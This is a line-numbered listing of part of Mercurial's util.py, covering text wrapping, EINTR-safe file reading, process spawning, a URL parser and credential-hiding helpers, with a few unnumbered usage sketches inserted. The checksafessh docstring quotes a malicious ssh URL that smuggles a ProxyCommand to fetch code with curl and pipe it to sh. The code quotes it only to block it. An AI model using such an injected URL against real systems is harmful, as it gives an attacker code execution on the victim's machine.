2449 2449 while chunks:
2450 2450
2451 2451 # Start the list of chunks that will make up the current line.
2452 2452 # cur_len is just the length of all the chunks in cur_line.
2453 2453 cur_line = []
2454 2454 cur_len = 0
2455 2455
2456 2456 # Figure out which static string will prefix this line.
2457 2457 if lines:
2458 2458 indent = self.subsequent_indent
2459 2459 else:
2460 2460 indent = self.initial_indent
2461 2461
2462 2462 # Maximum width for this line.
2463 2463 width = self.width - len(indent)
2464 2464
2465 2465 # First chunk on line is whitespace -- drop it, unless this
2466 2466 # is the very beginning of the text (i.e. no lines started yet).
2467 2467 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2468 2468 del chunks[-1]
2469 2469
2470 2470 while chunks:
2471 2471 l = colwidth(chunks[-1])
2472 2472
2473 2473 # Can at least squeeze this chunk onto the current line.
2474 2474 if cur_len + l <= width:
2475 2475 cur_line.append(chunks.pop())
2476 2476 cur_len += l
2477 2477
2478 2478 # Nope, this line is full.
2479 2479 else:
2480 2480 break
2481 2481
2482 2482 # The current line is full, and the next chunk is too big to
2483 2483 # fit on *any* line (not just this one).
2484 2484 if chunks and colwidth(chunks[-1]) > width:
2485 2485 self._handle_long_word(chunks, cur_line, cur_len, width)
2486 2486
2487 2487 # If the last chunk on this line is all whitespace, drop it.
2488 2488 if (self.drop_whitespace and
2489 2489 cur_line and cur_line[-1].strip() == r''):
2490 2490 del cur_line[-1]
2491 2491
2492 2492 # Convert current line back to a string and store it in list
2493 2493 # of all lines (return value).
2494 2494 if cur_line:
2495 2495 lines.append(indent + r''.join(cur_line))
2496 2496
2497 2497 return lines
2498 2498
2499 2499 global MBTextWrapper
2500 2500 MBTextWrapper = tw
2501 2501 return tw(**kwargs)
2502 2502
2503 2503 def wrap(line, width, initindent='', hangindent=''):
2504 2504 maxindent = max(len(hangindent), len(initindent))
2505 2505 if width <= maxindent:
2506 2506 # adjust for weird terminal size
2507 2507 width = max(78, maxindent + 1)
2508 2508 line = line.decode(pycompat.sysstr(encoding.encoding),
2509 2509 pycompat.sysstr(encoding.encodingmode))
2510 2510 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2511 2511 pycompat.sysstr(encoding.encodingmode))
2512 2512 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2513 2513 pycompat.sysstr(encoding.encodingmode))
2514 2514 wrapper = MBTextWrapper(width=width,
2515 2515 initial_indent=initindent,
2516 2516 subsequent_indent=hangindent)
2517 2517 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
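A hedged usage sketch of wrap() (illustrative input only): the byte string is decoded, wrapped by display columns through MBTextWrapper, and re-encoded, with hangindent prefixed to continuation lines.

# plain ASCII example; wide or ambiguous-width characters would wrap
# earlier, because columns rather than characters are counted
wrapped = wrap(b'the quick brown fox jumps over the lazy dog',
               20, hangindent=b'  ')
# 'wrapped' is a byte string whose lines fit in 20 columns, each
# continuation line starting with the two-space hangindent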
2518 2518
2519 2519 if (pyplatform.python_implementation() == 'CPython' and
2520 2520 sys.version_info < (3, 0)):
2521 2521 # There is an issue in CPython that some IO methods do not handle EINTR
2522 2522 # correctly. The following table shows what CPython version (and functions)
2523 2523 # are affected (buggy: has the EINTR bug, okay: otherwise):
2524 2524 #
2525 2525 #               | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2526 2526 # --------------------------------------------------
2527 2527 # fp.__iter__   | buggy   | buggy           | okay
2528 2528 # fp.read*      | buggy   | okay [1]        | okay
2529 2529 #
2530 2530 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2531 2531 #
2532 2532 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2533 2533 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2534 2534 #
2535 2535 # Although we can work around the EINTR issue for fp.__iter__, it is slower:
2536 2536 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2537 2537 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2538 2538 # fp.__iter__ but not other fp.read* methods.
2539 2539 #
2540 2540 # On modern systems like Linux, the "read" syscall cannot be interrupted
2541 2541 # when reading "fast" files like on-disk files. So the EINTR issue only
2542 2542 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2543 2543 # files approximately as "fast" files and use the fast (unsafe) code path,
2544 2544 # to minimize the performance impact.
2545 2545 if sys.version_info >= (2, 7, 4):
2546 2546 # fp.readline deals with EINTR correctly, use it as a workaround.
2547 2547 def _safeiterfile(fp):
2548 2548 return iter(fp.readline, '')
2549 2549 else:
2550 2550 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2551 2551 # note: this may block longer than necessary because of bufsize.
2552 2552 def _safeiterfile(fp, bufsize=4096):
2553 2553 fd = fp.fileno()
2554 2554 line = ''
2555 2555 while True:
2556 2556 try:
2557 2557 buf = os.read(fd, bufsize)
2558 2558 except OSError as ex:
2559 2559 # os.read only raises EINTR before any data is read
2560 2560 if ex.errno == errno.EINTR:
2561 2561 continue
2562 2562 else:
2563 2563 raise
2564 2564 line += buf
2565 2565 if '\n' in buf:
2566 2566 splitted = line.splitlines(True)
2567 2567 line = ''
2568 2568 for l in splitted:
2569 2569 if l[-1] == '\n':
2570 2570 yield l
2571 2571 else:
2572 2572 line = l
2573 2573 if not buf:
2574 2574 break
2575 2575 if line:
2576 2576 yield line
2577 2577
2578 2578 def iterfile(fp):
2579 2579 fastpath = True
2580 2580 if type(fp) is file:
2581 2581 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2582 2582 if fastpath:
2583 2583 return fp
2584 2584 else:
2585 2585 return _safeiterfile(fp)
2586 2586 else:
2587 2587 # PyPy and CPython 3 do not have the EINTR issue, thus no workaround is needed.
2588 2588 def iterfile(fp):
2589 2589 return fp
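A hedged usage sketch (a hypothetical caller, not an existing Mercurial call site): wrapping a pipe with iterfile() keeps line iteration alive on CPython 2 when a signal such as SIGCHLD interrupts a read, while ordinary on-disk files keep the fast path.

import subprocess
from mercurial import util

# any long-running child process will do; 'hg log' is just a stand-in
proc = subprocess.Popen(['hg', 'log'], stdout=subprocess.PIPE)
for line in util.iterfile(proc.stdout):
    pass  # each line still arrives even if a signal interrupts the read
proc.wait()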
2590 2590
2591 2591 def iterlines(iterator):
2592 2592 for chunk in iterator:
2593 2593 for line in chunk.splitlines():
2594 2594 yield line
2595 2595
2596 2596 def expandpath(path):
2597 2597 return os.path.expanduser(os.path.expandvars(path))
2598 2598
2599 2599 def hgcmd():
2600 2600 """Return the command used to execute current hg
2601 2601
2602 2602 This is different from hgexecutable() because on Windows we want
2603 2603 to avoid things opening new shell windows like batch files, so we
2604 2604 get either the python call or current executable.
2605 2605 """
2606 2606 if mainfrozen():
2607 2607 if getattr(sys, 'frozen', None) == 'macosx_app':
2608 2608 # Env variable set by py2app
2609 2609 return [encoding.environ['EXECUTABLEPATH']]
2610 2610 else:
2611 2611 return [pycompat.sysexecutable]
2612 2612 return gethgcmd()
2613 2613
2614 2614 def rundetached(args, condfn):
2615 2615 """Execute the argument list in a detached process.
2616 2616
2617 2617 condfn is a callable which is called repeatedly and should return
2618 2618 True once the child process is known to have started successfully.
2619 2619 At this point, the child process PID is returned. If the child
2620 2620 process fails to start or finishes before condfn() evaluates to
2621 2621 True, return -1.
2622 2622 """
2623 2623 # Windows case is easier because the child process is either
2624 2624 # successfully starting and validating the condition or exiting
2625 2625 # on failure. We just poll on its PID. On Unix, if the child
2626 2626 # process fails to start, it will be left in a zombie state until
2627 2627 # the parent wait on it, which we cannot do since we expect a long
2628 2628 # running process on success. Instead we listen for SIGCHLD telling
2629 2629 # us our child process terminated.
2630 2630 terminated = set()
2631 2631 def handler(signum, frame):
2632 2632 terminated.add(os.wait())
2633 2633 prevhandler = None
2634 2634 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2635 2635 if SIGCHLD is not None:
2636 2636 prevhandler = signal.signal(SIGCHLD, handler)
2637 2637 try:
2638 2638 pid = spawndetached(args)
2639 2639 while not condfn():
2640 2640 if ((pid in terminated or not testpid(pid))
2641 2641 and not condfn()):
2642 2642 return -1
2643 2643 time.sleep(0.1)
2644 2644 return pid
2645 2645 finally:
2646 2646 if prevhandler is not None:
2647 2647 signal.signal(signal.SIGCHLD, prevhandler)
2648 2648
2649 2649 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2650 2650 """Return the result of interpolating items in the mapping into string s.
2651 2651
2652 2652 prefix is a single character string, or a two character string with
2653 2653 a backslash as the first character if the prefix needs to be escaped in
2654 2654 a regular expression.
2655 2655
2656 2656 fn is an optional function that will be applied to the replacement text
2657 2657 just before replacement.
2658 2658
2659 2659 escape_prefix is an optional flag that allows using doubled prefix for
2660 2660 its escaping.
2661 2661 """
2662 2662 fn = fn or (lambda s: s)
2663 2663 patterns = '|'.join(mapping.keys())
2664 2664 if escape_prefix:
2665 2665 patterns += '|' + prefix
2666 2666 if len(prefix) > 1:
2667 2667 prefix_char = prefix[1:]
2668 2668 else:
2669 2669 prefix_char = prefix
2670 2670 mapping[prefix_char] = prefix_char
2671 2671 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2672 2672 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
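A hedged, doctest-style sketch (the mapping keys are invented for illustration): every key becomes one alternative in a single regular expression anchored on the prefix, and each match is replaced by its (optionally fn-transformed) value.

>>> interpolate('%', {'user': 'alice', 'repo': 'hg'},
...             'pushed to %repo by %user')
'pushed to hg by alice'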
2673 2673
2674 2674 def getport(port):
2675 2675 """Return the port for a given network service.
2676 2676
2677 2677 If port is an integer, it's returned as is. If it's a string, it's
2678 2678 looked up using socket.getservbyname(). If there's no matching
2679 2679 service, error.Abort is raised.
2680 2680 """
2681 2681 try:
2682 2682 return int(port)
2683 2683 except ValueError:
2684 2684 pass
2685 2685
2686 2686 try:
2687 2687 return socket.getservbyname(port)
2688 2688 except socket.error:
2689 2689 raise Abort(_("no port number associated with service '%s'") % port)
2690 2690
2691 2691 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2692 2692 '0': False, 'no': False, 'false': False, 'off': False,
2693 2693 'never': False}
2694 2694
2695 2695 def parsebool(s):
2696 2696 """Parse s into a boolean.
2697 2697
2698 2698 If s is not a valid boolean, returns None.
2699 2699 """
2700 2700 return _booleans.get(s.lower(), None)
2701 2701
2702 2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2703 2703 for a in string.hexdigits for b in string.hexdigits)
2704 2704
2705 2705 class url(object):
2706 2706 r"""Reliable URL parser.
2707 2707
2708 2708 This parses URLs and provides attributes for the following
2709 2709 components:
2710 2710
2711 2711 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2712 2712
2713 2713 Missing components are set to None. The only exception is
2714 2714 fragment, which is set to '' if present but empty.
2715 2715
2716 2716 If parsefragment is False, fragment is included in query. If
2717 2717 parsequery is False, query is included in path. If both are
2718 2718 False, both fragment and query are included in path.
2719 2719
2720 2720 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2721 2721
2722 2722 Note that for backward compatibility reasons, bundle URLs do not
2723 2723 take host names. That means 'bundle://../' has a path of '../'.
2724 2724
2725 2725 Examples:
2726 2726
2727 2727 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2728 2728 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2729 2729 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2730 2730 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2731 2731 >>> url(b'file:///home/joe/repo')
2732 2732 <url scheme: 'file', path: '/home/joe/repo'>
2733 2733 >>> url(b'file:///c:/temp/foo/')
2734 2734 <url scheme: 'file', path: 'c:/temp/foo/'>
2735 2735 >>> url(b'bundle:foo')
2736 2736 <url scheme: 'bundle', path: 'foo'>
2737 2737 >>> url(b'bundle://../foo')
2738 2738 <url scheme: 'bundle', path: '../foo'>
2739 2739 >>> url(br'c:\foo\bar')
2740 2740 <url path: 'c:\\foo\\bar'>
2741 2741 >>> url(br'\\blah\blah\blah')
2742 2742 <url path: '\\\\blah\\blah\\blah'>
2743 2743 >>> url(br'\\blah\blah\blah#baz')
2744 2744 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2745 2745 >>> url(br'file:///C:\users\me')
2746 2746 <url scheme: 'file', path: 'C:\\users\\me'>
2747 2747
2748 2748 Authentication credentials:
2749 2749
2750 2750 >>> url(b'ssh://joe:xyz@x/repo')
2751 2751 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2752 2752 >>> url(b'ssh://joe@x/repo')
2753 2753 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2754 2754
2755 2755 Query strings and fragments:
2756 2756
2757 2757 >>> url(b'http://host/a?b#c')
2758 2758 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2759 2759 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2760 2760 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2761 2761
2762 2762 Empty path:
2763 2763
2764 2764 >>> url(b'')
2765 2765 <url path: ''>
2766 2766 >>> url(b'#a')
2767 2767 <url path: '', fragment: 'a'>
2768 2768 >>> url(b'http://host/')
2769 2769 <url scheme: 'http', host: 'host', path: ''>
2770 2770 >>> url(b'http://host/#a')
2771 2771 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2772 2772
2773 2773 Only scheme:
2774 2774
2775 2775 >>> url(b'http:')
2776 2776 <url scheme: 'http'>
2777 2777 """
2778 2778
2779 2779 _safechars = "!~*'()+"
2780 2780 _safepchars = "/!~*'()+:\\"
2781 2781 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2782 2782
2783 2783 def __init__(self, path, parsequery=True, parsefragment=True):
2784 2784 # We slowly chomp away at path until we have only the path left
2785 2785 self.scheme = self.user = self.passwd = self.host = None
2786 2786 self.port = self.path = self.query = self.fragment = None
2787 2787 self._localpath = True
2788 2788 self._hostport = ''
2789 2789 self._origpath = path
2790 2790
2791 2791 if parsefragment and '#' in path:
2792 2792 path, self.fragment = path.split('#', 1)
2793 2793
2794 2794 # special case for Windows drive letters and UNC paths
2795 2795 if hasdriveletter(path) or path.startswith('\\\\'):
2796 2796 self.path = path
2797 2797 return
2798 2798
2799 2799 # For compatibility reasons, we can't handle bundle paths as
2800 2800 # normal URLs
2801 2801 if path.startswith('bundle:'):
2802 2802 self.scheme = 'bundle'
2803 2803 path = path[7:]
2804 2804 if path.startswith('//'):
2805 2805 path = path[2:]
2806 2806 self.path = path
2807 2807 return
2808 2808
2809 2809 if self._matchscheme(path):
2810 2810 parts = path.split(':', 1)
2811 2811 if parts[0]:
2812 2812 self.scheme, path = parts
2813 2813 self._localpath = False
2814 2814
2815 2815 if not path:
2816 2816 path = None
2817 2817 if self._localpath:
2818 2818 self.path = ''
2819 2819 return
2820 2820 else:
2821 2821 if self._localpath:
2822 2822 self.path = path
2823 2823 return
2824 2824
2825 2825 if parsequery and '?' in path:
2826 2826 path, self.query = path.split('?', 1)
2827 2827 if not path:
2828 2828 path = None
2829 2829 if not self.query:
2830 2830 self.query = None
2831 2831
2832 2832 # // is required to specify a host/authority
2833 2833 if path and path.startswith('//'):
2834 2834 parts = path[2:].split('/', 1)
2835 2835 if len(parts) > 1:
2836 2836 self.host, path = parts
2837 2837 else:
2838 2838 self.host = parts[0]
2839 2839 path = None
2840 2840 if not self.host:
2841 2841 self.host = None
2842 2842 # path of file:///d is /d
2843 2843 # path of file:///d:/ is d:/, not /d:/
2844 2844 if path and not hasdriveletter(path):
2845 2845 path = '/' + path
2846 2846
2847 2847 if self.host and '@' in self.host:
2848 2848 self.user, self.host = self.host.rsplit('@', 1)
2849 2849 if ':' in self.user:
2850 2850 self.user, self.passwd = self.user.split(':', 1)
2851 2851 if not self.host:
2852 2852 self.host = None
2853 2853
2854 2854 # Don't split on colons in IPv6 addresses without ports
2855 2855 if (self.host and ':' in self.host and
2856 2856 not (self.host.startswith('[') and self.host.endswith(']'))):
2857 2857 self._hostport = self.host
2858 2858 self.host, self.port = self.host.rsplit(':', 1)
2859 2859 if not self.host:
2860 2860 self.host = None
2861 2861
2862 2862 if (self.host and self.scheme == 'file' and
2863 2863 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2864 2864 raise Abort(_('file:// URLs can only refer to localhost'))
2865 2865
2866 2866 self.path = path
2867 2867
2868 2868 # leave the query string escaped
2869 2869 for a in ('user', 'passwd', 'host', 'port',
2870 2870 'path', 'fragment'):
2871 2871 v = getattr(self, a)
2872 2872 if v is not None:
2873 2873 setattr(self, a, urlreq.unquote(v))
2874 2874
2875 2875 @encoding.strmethod
2876 2876 def __repr__(self):
2877 2877 attrs = []
2878 2878 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2879 2879 'query', 'fragment'):
2880 2880 v = getattr(self, a)
2881 2881 if v is not None:
2882 2882 attrs.append('%s: %r' % (a, v))
2883 2883 return '<url %s>' % ', '.join(attrs)
2884 2884
2885 2885 def __bytes__(self):
2886 2886 r"""Join the URL's components back into a URL string.
2887 2887
2888 2888 Examples:
2889 2889
2890 2890 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2891 2891 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2892 2892 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2893 2893 'http://user:pw@host:80/?foo=bar&baz=42'
2894 2894 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2895 2895 'http://user:pw@host:80/?foo=bar%3dbaz'
2896 2896 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2897 2897 'ssh://user:pw@[::1]:2200//home/joe#'
2898 2898 >>> bytes(url(b'http://localhost:80//'))
2899 2899 'http://localhost:80//'
2900 2900 >>> bytes(url(b'http://localhost:80/'))
2901 2901 'http://localhost:80/'
2902 2902 >>> bytes(url(b'http://localhost:80'))
2903 2903 'http://localhost:80/'
2904 2904 >>> bytes(url(b'bundle:foo'))
2905 2905 'bundle:foo'
2906 2906 >>> bytes(url(b'bundle://../foo'))
2907 2907 'bundle:../foo'
2908 2908 >>> bytes(url(b'path'))
2909 2909 'path'
2910 2910 >>> bytes(url(b'file:///tmp/foo/bar'))
2911 2911 'file:///tmp/foo/bar'
2912 2912 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2913 2913 'file:///c:/tmp/foo/bar'
2914 2914 >>> print(url(br'bundle:foo\bar'))
2915 2915 bundle:foo\bar
2916 2916 >>> print(url(br'file:///D:\data\hg'))
2917 2917 file:///D:\data\hg
2918 2918 """
2919 2919 if self._localpath:
2920 2920 s = self.path
2921 2921 if self.scheme == 'bundle':
2922 2922 s = 'bundle:' + s
2923 2923 if self.fragment:
2924 2924 s += '#' + self.fragment
2925 2925 return s
2926 2926
2927 2927 s = self.scheme + ':'
2928 2928 if self.user or self.passwd or self.host:
2929 2929 s += '//'
2930 2930 elif self.scheme and (not self.path or self.path.startswith('/')
2931 2931 or hasdriveletter(self.path)):
2932 2932 s += '//'
2933 2933 if hasdriveletter(self.path):
2934 2934 s += '/'
2935 2935 if self.user:
2936 2936 s += urlreq.quote(self.user, safe=self._safechars)
2937 2937 if self.passwd:
2938 2938 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2939 2939 if self.user or self.passwd:
2940 2940 s += '@'
2941 2941 if self.host:
2942 2942 if not (self.host.startswith('[') and self.host.endswith(']')):
2943 2943 s += urlreq.quote(self.host)
2944 2944 else:
2945 2945 s += self.host
2946 2946 if self.port:
2947 2947 s += ':' + urlreq.quote(self.port)
2948 2948 if self.host:
2949 2949 s += '/'
2950 2950 if self.path:
2951 2951 # TODO: similar to the query string, we should not unescape the
2952 2952 # path when we store it, the path might contain '%2f' = '/',
2953 2953 # which we should *not* escape.
2954 2954 s += urlreq.quote(self.path, safe=self._safepchars)
2955 2955 if self.query:
2956 2956 # we store the query in escaped form.
2957 2957 s += '?' + self.query
2958 2958 if self.fragment is not None:
2959 2959 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2960 2960 return s
2961 2961
2962 2962 __str__ = encoding.strmethod(__bytes__)
2963 2963
2964 2964 def authinfo(self):
2965 2965 user, passwd = self.user, self.passwd
2966 2966 try:
2967 2967 self.user, self.passwd = None, None
2968 2968 s = bytes(self)
2969 2969 finally:
2970 2970 self.user, self.passwd = user, passwd
2971 2971 if not self.user:
2972 2972 return (s, None)
2973 2973 # authinfo[1] is passed to urllib2 password manager, and its
2974 2974 # URIs must not contain credentials. The host is passed in the
2975 2975 # URIs list because Python < 2.4.3 uses only that to search for
2976 2976 # a password.
2977 2977 return (s, (None, (s, self.host),
2978 2978 self.user, self.passwd or ''))
2979 2979
2980 2980 def isabs(self):
2981 2981 if self.scheme and self.scheme != 'file':
2982 2982 return True # remote URL
2983 2983 if hasdriveletter(self.path):
2984 2984 return True # absolute for our purposes - can't be joined()
2985 2985 if self.path.startswith(br'\\'):
2986 2986 return True # Windows UNC path
2987 2987 if self.path.startswith('/'):
2988 2988 return True # POSIX-style
2989 2989 return False
2990 2990
2991 2991 def localpath(self):
2992 2992 if self.scheme == 'file' or self.scheme == 'bundle':
2993 2993 path = self.path or '/'
2994 2994 # For Windows, we need to promote hosts containing drive
2995 2995 # letters to paths with drive letters.
2996 2996 if hasdriveletter(self._hostport):
2997 2997 path = self._hostport + '/' + self.path
2998 2998 elif (self.host is not None and self.path
2999 2999 and not hasdriveletter(path)):
3000 3000 path = '/' + path
3001 3001 return path
3002 3002 return self._origpath
3003 3003
3004 3004 def islocal(self):
3005 3005 '''whether localpath will return something that posixfile can open'''
3006 3006 return (not self.scheme or self.scheme == 'file'
3007 3007 or self.scheme == 'bundle')
3008 3008
3009 3009 def hasscheme(path):
3010 3010 return bool(url(path).scheme)
3011 3011
3012 3012 def hasdriveletter(path):
3013 3013 return path and path[1:2] == ':' and path[0:1].isalpha()
3014 3014
3015 3015 def urllocalpath(path):
3016 3016 return url(path, parsequery=False, parsefragment=False).localpath()
3017 3017
3018 3018 def checksafessh(path):
3019 3019 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3020 3020
3021 3021 This is a sanity check for ssh urls. ssh will parse the first item as
3022 3022 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3023 3023 Let's prevent these potentially exploitable URLs entirely and warn the
3024 3024 user.
3025 3025
3026 3026 Raises an error.Abort when the url is unsafe.
3027 3027 """
3028 3028 path = urlreq.unquote(path)
3029 3029 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3030 3030 raise error.Abort(_('potentially unsafe url: %r') %
3031 3031 (path,))
3032 3032
3033 3033 def hidepassword(u):
3034 3034 '''hide user credential in a url string'''
3035 3035 u = url(u)
3036 3036 if u.passwd:
3037 3037 u.passwd = '***'
3038 3038 return bytes(u)
3039 3039
3040 3040 def removeauth(u):
3041 3041 '''remove all authentication information from a url string'''
3042 3042 u = url(u)
3043 3043 u.user = u.passwd = None
3044 3044 return str(u)
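A hedged, doctest-style illustration of the two helpers above (the credentials are invented):

>>> hidepassword(b'http://alice:hunter2@example.com/repo')
'http://alice:***@example.com/repo'
>>> removeauth(b'http://alice:hunter2@example.com/repo')
'http://example.com/repo'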
3045 3045
3046 3046 timecount = unitcountfn(
3047 3047 (1, 1e3, _('%.0f s')),
3048 3048 (100, 1, _('%.1f s')),
3049 3049 (10, 1, _('%.2f s')),
3050 3050 (1, 1, _('%.3f s')),
3051 3051 (100, 0.001, _('%.1f ms')),
3052 3052 (10, 0.001, _('%.2f ms')),
3053 3053 (1, 0.001, _('%.3f ms')),
3054 3054 (100, 0.000001, _('%.1f us')),
3055 3055 (10, 0.000001, _('%.2f us')),
3056 3056 (1, 0.000001, _('%.3f us')),
3057 3057 (100, 0.000000001, _('%.1f ns')),
3058 3058 (10, 0.000000001, _('%.2f ns')),
3059 3059 (1, 0.000000001, _('%.3f ns')),
3060 3060 )
3061 3061
3062 3062 _timenesting = [0]
3063 3063
3064 3064 def timed(func):
3065 3065 '''Report the execution time of a function call to stderr.
3066 3066
3067 3067 During development, use as a decorator when you need to measure
3068 3068 the cost of a function, e.g. as follows:
3069 3069
3070 3070 @util.timed
3071 3071 def foo(a, b, c):
3072 3072 pass
3073 3073 '''
3074 3074
3075 3075 def wrapper(*args, **kwargs):
3076 3076 start = timer()
3077 3077 indent = 2
3078 3078 _timenesting[0] += indent
3079 3079 try:
3080 3080 return func(*args, **kwargs)
3081 3081 finally:
3082 3082 elapsed = timer() - start
3083 3083 _timenesting[0] -= indent
3084 3084 stderr.write('%s%s: %s\n' %
3085 3085 (' ' * _timenesting[0], func.__name__,
3086 3086 timecount(elapsed)))
3087 3087 return wrapper
3088 3088
3089 3089 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3090 3090 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3091 3091
3092 3092 def sizetoint(s):
3093 3093 '''Convert a space specifier to a byte count.
3094 3094
3095 3095 >>> sizetoint(b'30')
3096 3096 30
3097 3097 >>> sizetoint(b'2.2kb')
3098 3098 2252
3099 3099 >>> sizetoint(b'6M')
3100 3100 6291456
3101 3101 '''
3102 3102 t = s.strip().lower()
3103 3103 try:
3104 3104 for k, u in _sizeunits:
3105 3105 if t.endswith(k):
3106 3106 return int(float(t[:-len(k)]) * u)
3107 3107 return int(t)
3108 3108 except ValueError:
3109 3109 raise error.ParseError(_("couldn't parse size: %s") % s)
3110 3110
3111 3111 class hooks(object):
3112 3112 '''A collection of hook functions that can be used to extend a
3113 3113 function's behavior. Hooks are called in lexicographic order,
3114 3114 based on the names of their sources.'''
3115 3115
3116 3116 def __init__(self):
3117 3117 self._hooks = []
3118 3118
3119 3119 def add(self, source, hook):
3120 3120 self._hooks.append((source, hook))
3121 3121
3122 3122 def __call__(self, *args):
3123 3123 self._hooks.sort(key=lambda x: x[0])
3124 3124 results = []
3125 3125 for source, hook in self._hooks:
3126 3126 results.append(hook(*args))
3127 3127 return results
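A hedged sketch of the hooks helper (the source names are invented): callbacks run in lexicographic order of their source names, and the call returns their results in that order.

>>> h = hooks()
>>> h.add(b'zzz-ext', lambda n: n * 2)
>>> h.add(b'aaa-ext', lambda n: n + 1)
>>> h(10)   # 'aaa-ext' sorts before 'zzz-ext'
[11, 20]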
3128 3128
3129 3129 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3130 3130 '''Yields lines for a nicely formatted stacktrace.
3131 3131 Skips the 'skip' last entries, then returns the last 'depth' entries.
3132 3132 Each file+linenumber is formatted according to fileline.
3133 3133 Each line is formatted according to line.
3134 3134 If line is None, it yields:
3135 3135 length of longest filepath+line number,
3136 3136 filepath+linenumber,
3137 3137 function
3138 3138
3139 3139 Not to be used in production code, but very convenient while developing.
3140 3140 '''
3141 3141 entries = [(fileline % (fn, ln), func)
3142 3142 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3143 3143 ][-depth:]
3144 3144 if entries:
3145 3145 fnmax = max(len(entry[0]) for entry in entries)
3146 3146 for fnln, func in entries:
3147 3147 if line is None:
3148 3148 yield (fnmax, fnln, func)
3149 3149 else:
3150 3150 yield line % (fnmax, fnln, func)
3151 3151
3152 3152 def debugstacktrace(msg='stacktrace', skip=0,
3153 3153 f=stderr, otherf=stdout, depth=0):
3154 3154 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3155 3155 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3156 3156 By default it will flush stdout first.
3157 3157 It can be used everywhere and intentionally does not require an ui object.
3158 3158 Not to be used in production code, but very convenient while developing.
3159 3159 '''
3160 3160 if otherf:
3161 3161 otherf.flush()
3162 3162 f.write('%s at:\n' % msg.rstrip())
3163 3163 for line in getstackframes(skip + 1, depth=depth):
3164 3164 f.write(line)
3165 3165 f.flush()
3166 3166
3167 3167 class dirs(object):
3168 3168 '''a multiset of directory names from a dirstate or manifest'''
3169 3169
3170 3170 def __init__(self, map, skip=None):
3171 3171 self._dirs = {}
3172 3172 addpath = self.addpath
3173 3173 if safehasattr(map, 'iteritems') and skip is not None:
3174 3174 for f, s in map.iteritems():
3175 3175 if s[0] != skip:
3176 3176 addpath(f)
3177 3177 else:
3178 3178 for f in map:
3179 3179 addpath(f)
3180 3180
3181 3181 def addpath(self, path):
3182 3182 dirs = self._dirs
3183 3183 for base in finddirs(path):
3184 3184 if base in dirs:
3185 3185 dirs[base] += 1
3186 3186 return
3187 3187 dirs[base] = 1
3188 3188
3189 3189 def delpath(self, path):
3190 3190 dirs = self._dirs
3191 3191 for base in finddirs(path):
3192 3192 if dirs[base] > 1:
3193 3193 dirs[base] -= 1
3194 3194 return
3195 3195 del dirs[base]
3196 3196
3197 3197 def __iter__(self):
3198 3198 return iter(self._dirs)
3199 3199
3200 3200 def __contains__(self, d):
3201 3201 return d in self._dirs
3202 3202
3203 3203 if safehasattr(parsers, 'dirs'):
3204 3204 dirs = parsers.dirs
3205 3205
3206 3206 def finddirs(path):
3207 3207 pos = path.rfind('/')
3208 3208 while pos != -1:
3209 3209 yield path[:pos]
3210 3210 pos = path.rfind('/', 0, pos)
3211 3211
3212 3212 # compression code
3213 3213
3214 3214 SERVERROLE = 'server'
3215 3215 CLIENTROLE = 'client'
3216 3216
3217 3217 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3218 3218 (u'name', u'serverpriority',
3219 3219 u'clientpriority'))
3220 3220
3221 3221 class compressormanager(object):
3222 3222 """Holds registrations of various compression engines.
3223 3223
3224 3224 This class essentially abstracts the differences between compression
3225 3225 engines to allow new compression formats to be added easily, possibly from
